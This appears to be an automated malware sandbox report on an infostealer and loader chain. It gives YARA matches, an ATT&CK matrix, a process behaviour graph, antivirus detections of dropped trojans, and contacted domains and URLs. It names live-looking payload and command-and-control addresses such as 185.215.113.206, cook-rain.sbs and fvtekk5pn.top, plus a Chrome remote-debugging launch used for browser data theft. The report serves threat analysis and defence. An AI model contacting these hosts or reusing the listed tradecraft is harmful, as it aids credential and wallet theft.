                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
                          Source: Yara matchFile source: Process Memory Space: aca7749dee.exe PID: 8168, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: aca7749dee.exe PID: 3440, type: MEMORYSTR
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 7b9f3f6834.exe PID: 2896, type: MEMORYSTR
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: Process Memory Space: 7b9f3f6834.exe PID: 7968, type: MEMORYSTR
                          Source: Yara matchFile source: 0000000A.00000002.3193106380.000000000196E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.3165203944.0000000000CD1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000003.2681589371.00000000056B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001E.00000002.3255211624.0000000000CD1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001E.00000002.3249141713.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001E.00000003.2827602995.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000037.00000003.3183348550.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: a78a39a396.exe PID: 7920, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: a78a39a396.exe PID: 8040, type: MEMORYSTR
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 0000000A.00000002.3193106380.000000000196E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: a78a39a396.exe PID: 7920, type: MEMORYSTR
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
                          Windows Management Instrumentation
                          1
                          DLL Side-Loading
                          1
                          DLL Side-Loading
                          411
                          Disable or Modify Tools
                          2
                          OS Credential Dumping
                          13
                          File and Directory Discovery
                          Remote Services1
                          Archive Collected Data
                          11
                          Ingress Tool Transfer
                          Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts2
                          Command and Scripting Interpreter
                          1
                          Scheduled Task/Job
                          2
                          Bypass User Account Control
                          1
                          Deobfuscate/Decode Files or Information
                          LSASS Memory236
                          System Information Discovery
                          Remote Desktop Protocol41
                          Data from Local System
                          1
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts1
                          Scheduled Task/Job
                          11
                          Registry Run Keys / Startup Folder
                          1
                          Extra Window Memory Injection
                          2
                          Obfuscated Files or Information
                          Security Account Manager1
                          Query Registry
                          SMB/Windows Admin Shares1
                          Email Collection
                          1
                          Remote Access Software
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts1
                          PowerShell
                          Login Hook12
                          Process Injection
                          12
                          Software Packing
                          NTDS871
                          Security Software Discovery
                          Distributed Component Object ModelInput Capture3
                          Non-Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                          Scheduled Task/Job
                          1
                          DLL Side-Loading
                          LSA Secrets2
                          Process Discovery
                          SSHKeylogging114
                          Application Layer Protocol
                          Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                          Registry Run Keys / Startup Folder
                          2
                          Bypass User Account Control
                          Cached Domain Credentials371
                          Virtualization/Sandbox Evasion
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Extra Window Memory Injection
                          DCSync1
                          Application Window Discovery
                          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job121
                          Masquerading
                          Proc Filesystem1
                          Remote System Discovery
                          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt371
                          Virtualization/Sandbox Evasion
                          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                          Process Injection
                          Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560104 Sample: file.exe Startdate: 21/11/2024 Architecture: WINDOWS Score: 100 112 cook-rain.sbs 2->112 114 youtube.com 2->114 116 41 other IPs or domains 2->116 156 Suricata IDS alerts for network traffic 2->156 158 Found malware configuration 2->158 160 Antivirus detection for dropped file 2->160 162 18 other signatures 2->162 10 skotes.exe 4 29 2->10         started        15 file.exe 5 2->15         started        17 7b9f3f6834.exe 2->17         started        19 6 other processes 2->19 signatures3 process4 dnsIp5 136 185.215.113.43, 49758, 49764, 49796 WHOLESALECONNECTIONSNL Portugal 10->136 138 185.215.113.16, 49802, 80 WHOLESALECONNECTIONSNL Portugal 10->138 140 31.41.244.11, 49770, 80 AEROEXPRESS-ASRU Russian Federation 10->140 96 C:\Users\user\AppData\...\76dd304e1d.exe, PE32 10->96 dropped 98 C:\Users\user\AppData\...\aca7749dee.exe, PE32 10->98 dropped 100 C:\Users\user\AppData\...\a78a39a396.exe, PE32 10->100 dropped 106 7 other malicious files 10->106 dropped 190 Creates multiple autostart registry keys 10->190 192 Hides threads from debuggers 10->192 194 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->194 21 a78a39a396.exe 10->21         started        26 7b9f3f6834.exe 10->26         started        28 76dd304e1d.exe 10->28         started        38 2 other processes 10->38 102 C:\Users\user\AppData\Local\...\skotes.exe, PE32 15->102 dropped 104 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 15->104 dropped 196 Detected unpacking (changes PE section rights) 15->196 198 Tries to evade debugger and weak emulator (self modifying code) 15->198 200 Tries to detect virtualization through RDTSC time measurements 15->200 30 skotes.exe 15->30         started        202 Query firmware table information (likely to detect VMs) 17->202 204 Tries to harvest and steal ftp login credentials 17->204 206 Tries to harvest and steal browser information (history, passwords, etc) 17->206 208 Binary is likely a compiled AutoIt script file 19->208 210 Tries to steal Crypto Currency Wallets 19->210 212 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 19->212 32 firefox.exe 19->32         started        34 chrome.exe 19->34         started        36 taskkill.exe 19->36         started        40 5 other processes 19->40 file6 signatures7 process8 dnsIp9 128 185.215.113.206 WHOLESALECONNECTIONSNL Portugal 21->128 86 C:\Users\user\DocumentsCFCGIIEHIE.exe, PE32 21->86 dropped 88 C:\Users\user\AppData\...\softokn3[1].dll, PE32 21->88 dropped 90 C:\Users\user\AppData\Local\...\random[2].exe, PE32 21->90 dropped 94 12 other files (8 malicious) 21->94 dropped 164 Antivirus detection for dropped file 21->164 166 Multi AV Scanner detection for dropped file 21->166 168 Detected unpacking (changes PE section rights) 21->168 184 9 other signatures 21->184 42 cmd.exe 21->42         started        44 chrome.exe 21->44         started        130 cook-rain.sbs 188.114.96.3 CLOUDFLARENETUS European Union 26->130 170 Query firmware table information (likely to detect VMs) 26->170 172 Machine Learning detection for dropped file 26->172 174 Found many strings related to Crypto-Wallets (likely being stolen) 26->174 176 Modifies windows update settings 28->176 178 Disables Windows Defender Tamper protection 28->178 186 3 other signatures 28->186 188 3 other signatures 30->188 47 firefox.exe 32->47         started        50 chrome.exe 34->50         started        52 conhost.exe 36->52         started        132 fvtekk5pn.top 34.116.198.130, 49803, 80 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 38->132 134 home.fvtekk5pn.top 38->134 92 C:\Users\user\AppData\...\service123.exe, PE32 38->92 dropped 180 Binary is likely a compiled AutoIt script file 38->180 182 Drops large PE files 38->182 54 firefox.exe 38->54         started        56 taskkill.exe 38->56         started        58 6 other processes 38->58 60 4 other processes 40->60 file10 signatures11 process12 dnsIp13 62 DocumentsCFCGIIEHIE.exe 42->62         started        65 conhost.exe 42->65         started        142 192.168.2.4, 443, 49672, 49723 unknown unknown 44->142 144 239.255.255.250 unknown Reserved 44->144 67 chrome.exe 44->67         started        70 chrome.exe 44->70         started        146 push.services.mozilla.com 34.107.243.93 GOOGLEUS United States 47->146 152 6 other IPs or domains 47->152 108 C:\Users\user\AppData\...\gmpopenh264.dll.tmp, PE32+ 47->108 dropped 110 C:\Users\user\...\gmpopenh264.dll (copy), PE32+ 47->110 dropped 72 firefox.exe 47->72         started        148 s-part-0015.t-0009.t-msedge.net 13.107.246.43 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 50->148 150 s-part-0016.t-0009.t-msedge.net 13.107.246.44 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 50->150 154 7 other IPs or domains 50->154 74 firefox.exe 54->74         started        76 conhost.exe 56->76         started        78 conhost.exe 58->78         started        80 4 other processes 58->80 file14 process15 dnsIp16 214 Multi AV Scanner detection for dropped file 62->214 216 Detected unpacking (changes PE section rights) 62->216 218 Tries to evade debugger and weak emulator (self modifying code) 62->218 220 3 other signatures 62->220 118 www.google.com 142.250.186.36 GOOGLEUS United States 67->118 120 142.250.186.132 GOOGLEUS United States 70->120 122 youtube.com 216.58.206.46 GOOGLEUS United States 74->122 124 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 GOOGLEUS United States 74->124 126 2 other IPs or domains 74->126 82 firefox.exe 74->82         started        84 firefox.exe 74->84         started        signatures17 process18

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          file.exe50%ReversingLabsWin32.Packed.Themida
                          file.exe100%AviraTR/Crypt.TPM.Gen
                          file.exe100%Joe Sandbox ML
                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                          C:\ProgramData\freebl3.dll0%ReversingLabs
                          C:\ProgramData\mozglue.dll0%ReversingLabs
                          C:\ProgramData\msvcp140.dll0%ReversingLabs
                          C:\ProgramData\nss3.dll0%ReversingLabs
                          C:\ProgramData\softokn3.dll0%ReversingLabs
                          C:\ProgramData\vcruntime140.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe42%ReversingLabsWin32.Infostealer.Tinba
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe39%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe32%ReversingLabsWin32.Trojan.AutoitInject
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe42%ReversingLabsWin32.Trojan.Symmi
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe50%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe42%ReversingLabsWin32.Trojan.Symmi
                          C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe39%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exe32%ReversingLabsWin32.Trojan.AutoitInject
                          C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exe42%ReversingLabsWin32.Infostealer.Tinba
                          C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe50%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\Local\Temp\service123.exe46%ReversingLabsWin32.Trojan.Loaderz
                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll.tmp0%ReversingLabs
                          C:\Users\user\DocumentsCFCGIIEHIE.exe50%ReversingLabsWin32.Trojan.Generic
                          No Antivirus matches
                          No Antivirus matches
                          No Antivirus matches
                          NameIPActiveMaliciousAntivirus DetectionReputation
                          example.org
                          93.184.215.14
                          truefalse
                            s-part-0016.t-0009.t-msedge.net
                            13.107.246.44
                            truefalse
                              home.fvtekk5pn.top
                              34.116.198.130
                              truetrue
                                prod.detectportal.prod.cloudops.mozgcp.net
                                34.107.221.82
                                truefalse
                                  services.addons.mozilla.org
                                  151.101.129.91
                                  truefalse
                                    fvtekk5pn.top
                                    34.116.198.130
                                    truetrue
                                      contile.services.mozilla.com
                                      34.117.188.166
                                      truefalse
                                        prod.content-signature-chains.prod.webservices.mozgcp.net
                                        34.160.144.191
                                        truefalse
                                          us-west1.prod.sumo.prod.webservices.mozgcp.net
                                          34.149.128.2
                                          truefalse
                                            ipv4only.arpa
                                            192.0.0.170
                                            truefalse
                                              prod.ads.prod.webservices.mozgcp.net
                                              34.117.188.166
                                              truefalse
                                                push.services.mozilla.com
                                                34.107.243.93
                                                truefalse
                                                  www.google.com
                                                  142.250.186.36
                                                  truefalse
                                                    star-mini.c10r.facebook.com
                                                    157.240.0.35
                                                    truefalse
                                                      prod.classify-client.prod.webservices.mozgcp.net
                                                      35.190.72.216
                                                      truefalse
                                                        prod.balrog.prod.cloudops.mozgcp.net
                                                        35.244.181.201
                                                        truefalse
                                                          twitter.com
                                                          104.244.42.193
                                                          truefalse
                                                            cook-rain.sbs
                                                            188.114.96.3
                                                            truetrue
                                                              s-part-0017.t-0009.t-msedge.net
                                                              13.107.246.45
                                                              truefalse
                                                                dyna.wikimedia.org
                                                                185.15.59.224
                                                                truefalse
                                                                  prod.remote-settings.prod.webservices.mozgcp.net
                                                                  34.149.100.209
                                                                  truefalse
                                                                    youtube.com
                                                                    216.58.206.46
                                                                    truefalse
                                                                      youtube-ui.l.google.com
                                                                      172.217.16.206
                                                                      truefalse
                                                                        reddit.map.fastly.net
                                                                        151.101.1.140
                                                                        truefalse
                                                                          s-part-0015.t-0009.t-msedge.net
                                                                          13.107.246.43
                                                                          truefalse
                                                                            telemetry-incoming.r53-2.services.mozilla.com
                                                                            34.120.208.123
                                                                            truefalse
                                                                              js.monitor.azure.com
                                                                              unknown
                                                                              unknownfalse
                                                                                www.reddit.com
                                                                                unknown
                                                                                unknownfalse
                                                                                  spocs.getpocket.com
                                                                                  unknown
                                                                                  unknownfalse
                                                                                    content-signature-2.cdn.mozilla.net
                                                                                    unknown
                                                                                    unknownfalse
                                                                                      support.mozilla.org
                                                                                      unknown
                                                                                      unknownfalse
                                                                                        firefox.settings.services.mozilla.com
                                                                                        unknown
                                                                                        unknownfalse
                                                                                          www.youtube.com
                                                                                          unknown
                                                                                          unknownfalse
                                                                                            www.facebook.com
                                                                                            unknown
                                                                                            unknownfalse
                                                                                              detectportal.firefox.com
                                                                                              unknown
                                                                                              unknownfalse
                                                                                                shavar.services.mozilla.com
                                                                                                unknown
                                                                                                unknownfalse
                                                                                                  www.wikipedia.org
                                                                                                  unknown
                                                                                                  unknownfalse
                                                                                                    NameMaliciousAntivirus DetectionReputation
                                                                                                    http://185.215.113.206/true
                                                                                                      http://185.215.113.206/68b591d6548ec281/nss3.dlltrue
                                                                                                        http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347true
                                                                                                          p10tgrace.sbstrue
                                                                                                            p3ar11fter.sbstrue
                                                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                                                              https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                https://cook-rain.sbs/api-7b9f3f6834.exe, 0000000B.00000003.2902024958.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2924608314.0000000001A6A000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2924386969.0000000001A64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                    https://cook-rain.sbs/api17b9f3f6834.exe, 0000000B.00000003.3058822351.0000000001A67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      http://anglebug.com/4633chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        https://anglebug.com/7382chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          https://merino.services.mozilla.com/api/v1/suggestfirefox.exe, 00000021.00000002.2921553083.000001F3C3786000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3126528497.000001E5765C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3128084836.000001E5765C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3132248353.000001E5765C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3133263027.000001E5765C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3098704284.000001E5765C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3102704883.000001E5765C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3105310182.000001E5765C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            https://json-schema.org/draft/2019-09/schema.firefox.exe, 00000030.00000003.3108396248.000001E58021D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              https://spocs.getpocket.com/spocsfirefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEMfirefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                  https://www.amazon.com/exec/obidos/external-search/firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3234358102.000001E575C2D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    http://185.215.113.206/68b591d6548ec281/nss3.dllcOpa78a39a396.exe, 0000000A.00000002.3193106380.00000000019E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      http://anglebug.com/6929chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        https://cook-rain.sbs/api(7b9f3f6834.exe, 0000000B.00000003.2874285828.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2876379077.0000000001A5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          https://github.com/mozilla-services/screenshotsfirefox.exe, 0000001A.00000003.2819477848.0000018D7271E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2818931962.0000018D74800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2820218486.0000018D7273A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2822012559.0000018D72773000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2821424363.0000018D72757000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            https://cook-rain.sbs/apierOK7b9f3f6834.exe, 00000009.00000002.2849912113.000000000168F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              https://tracking-protection-issues.herokuapp.com/newfirefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                http://src.chromium.org/viewvc/chrome/trunk/src/third_party/cld/languages/internal/languages.ccfirefox.exe, 00000030.00000003.2988289732.000001E575BF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.2991388237.000001E575D6A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.2990821035.000001E575D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  https://anglebug.com/7246chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    https://anglebug.com/7369chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      https://anglebug.com/7489chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-reportfirefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                          https://cook-rain.sbs/6-7b9f3f6834.exe, 0000000B.00000003.2902024958.0000000001A5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            https://firefox.settings.services.mozilla.com/v1ifirefox.exe, 00000030.00000003.3093201942.000001E580493000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              http://185.215.113.206ga78a39a396.exe, 0000001E.00000002.3249141713.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                  https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta7b9f3f6834.exe, 00000009.00000003.2723646367.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2724507880.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000002.3193106380.0000000001A3F000.00000004.00000020.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000002.3262207220.0000000023F62000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2879532375.0000000005E63000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2912418827.000001C300FC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2921553083.000001F3C37EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://issuetracker.google.com/161903006chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://www.ecosia.org/newtab/7b9f3f6834.exe, 00000009.00000003.2647648125.0000000005DEF000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2648045423.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2647840214.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811496040.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811369674.0000000005E9F000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811865064.0000000005E9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        http://185.215.113.206/68b591d6548ec281/msvcp140.dllfa78a39a396.exe, 0000000A.00000002.3193106380.00000000019B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://MD8.mozilla.org/1/mfirefox.exe, 00000030.00000003.3135955802.000001E580226000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=firefox.exe, 00000021.00000002.2921553083.000001F3C37C7000.00000004.00000800.00020000.00000000.sdmpfalse
